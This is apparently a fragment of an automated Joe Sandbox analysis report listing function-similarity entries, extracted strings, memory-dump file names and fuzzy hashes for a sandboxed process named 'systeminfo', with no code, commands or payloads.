                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 0-871070163
                                                                                                                                                                                • Opcode ID: 86147496c02fbc0a1edd061ae06a9483f2de3f0e59e4649357765c084cf4f272
                                                                                                                                                                                • Instruction ID: 1ff77976c233b6979f75f28fd956454973004377b7b1fe0287ab1b7b43362bd9
                                                                                                                                                                                • Opcode Fuzzy Hash: 86147496c02fbc0a1edd061ae06a9483f2de3f0e59e4649357765c084cf4f272
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D41D0353007029FDB24DE29E941B6AB7E6FF88714F100A1DE95ADB780EB71F9058B91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047D728C
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D72C1
                                                                                                                                                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047D7294
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047D72A3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                                • API String ID: 885266447-605551621
                                                                                                                                                                                • Opcode ID: 46bf0aa6960dc8997b1c3d702d8613c43ca9b66c2689d9b3c71b8e7c4fd26147
                                                                                                                                                                                • Instruction ID: cebd585bf2c97341f77f5440ccc7f3884a3a2bc5c9355a4f8f71c9665e2096eb
                                                                                                                                                                                • Opcode Fuzzy Hash: 46bf0aa6960dc8997b1c3d702d8613c43ca9b66c2689d9b3c71b8e7c4fd26147
                                                                                                                                                                                • Instruction Fuzzy Hash: A3410032700246ABDB24DE25DD42B6AB7F5FB88714F100A19FA55EB340EB31F8529BD1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$]:%u
                                                                                                                                                                                • API String ID: 48624451-3050659472
                                                                                                                                                                                • Opcode ID: 627613843629ca5eb3e985906a9dfd943ea91b5a39314cd9e33cf16ce0088dc9
                                                                                                                                                                                • Instruction ID: ab5e8ebb3fc8a1c3fc1554636fd2f2a6edc8634e310c6b70dfc0b3dcb9d8b46d
                                                                                                                                                                                • Opcode Fuzzy Hash: 627613843629ca5eb3e985906a9dfd943ea91b5a39314cd9e33cf16ce0088dc9
                                                                                                                                                                                • Instruction Fuzzy Hash: F5315772A002199FDB24DE2DDC40BEEB7BCEF44754F444996E849E3250EB30BA558BA1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$0$:!$age=$qz9A
                                                                                                                                                                                • API String ID: 0-1418462814
                                                                                                                                                                                • Opcode ID: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction ID: 8be0e4880b6c4b78c951548ea25ce86b4770404534c5b55abe6f4e99dd245992
                                                                                                                                                                                • Opcode Fuzzy Hash: c174832a5115f4541122311bea2df09388683f009847876670376b89c78c542e
                                                                                                                                                                                • Instruction Fuzzy Hash: C4117830028B844ACB05AB10C41469ABBE1FFD931DF900B5CECC9DB261EA38D385C74B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: GQZ$VW\F$V]EA$Y]$^[YW
                                                                                                                                                                                • API String ID: 0-3218079648
                                                                                                                                                                                • Opcode ID: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction ID: ade3f8976da7fae0f022d3a1a73e1c74011823da135264843c8cdf99d4308e13
                                                                                                                                                                                • Opcode Fuzzy Hash: 0b45a212d8b2b0cc3f5515fd12286ee571d956451be18484cb5e6fc4ed393a1a
                                                                                                                                                                                • Instruction Fuzzy Hash: 6921F0B180068C8ACF15DFD1D5486EDBFB4FB04308F608598C0AAAF256D735454ADF89
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-
                                                                                                                                                                                • API String ID: 1302938615-2137968064
                                                                                                                                                                                • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction ID: 896fdc272034aadc22b8b5d322ce21ff70b06a79a33dce372681cf33829a6b5d
                                                                                                                                                                                • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                                • Instruction Fuzzy Hash: 9191A571E002159FDF28DF69C8816BEB7A5AFC4720F54471AE855EB3C0E730EA618761
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $$@
                                                                                                                                                                                • API String ID: 0-1194432280
                                                                                                                                                                                • Opcode ID: 49f49df40fa171490e1a71a08610359840b53c7522e6736740f7ec0202119780
                                                                                                                                                                                • Instruction ID: 08b8e83a39742a63117019e7860ee851ad539b5a5b0ff4ebbdf806e818e732c8
                                                                                                                                                                                • Opcode Fuzzy Hash: 49f49df40fa171490e1a71a08610359840b53c7522e6736740f7ec0202119780
                                                                                                                                                                                • Instruction Fuzzy Hash: 66811CB1D002699BDB35DB54CC44BEEB7B8AB48714F0045DAEA19B7740E7346E84DFA0
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: /e)$$:!$G8qz$qz9A
                                                                                                                                                                                • API String ID: 0-2035482291
                                                                                                                                                                                • Opcode ID: 608cde451d347c93fdae26783c383343596def130a3ce57387d0dff6a9e951ef
                                                                                                                                                                                • Instruction ID: 0dc319663fe505df3ec1111dc58780abb2a6aafacd15015cf79a980e7d40d868
                                                                                                                                                                                • Opcode Fuzzy Hash: 608cde451d347c93fdae26783c383343596def130a3ce57387d0dff6a9e951ef
                                                                                                                                                                                • Instruction Fuzzy Hash: 30F0A034018BC44AD709AB14C45429ABBD1FBD830CF400B5CE889DA2A0DA38D745C74B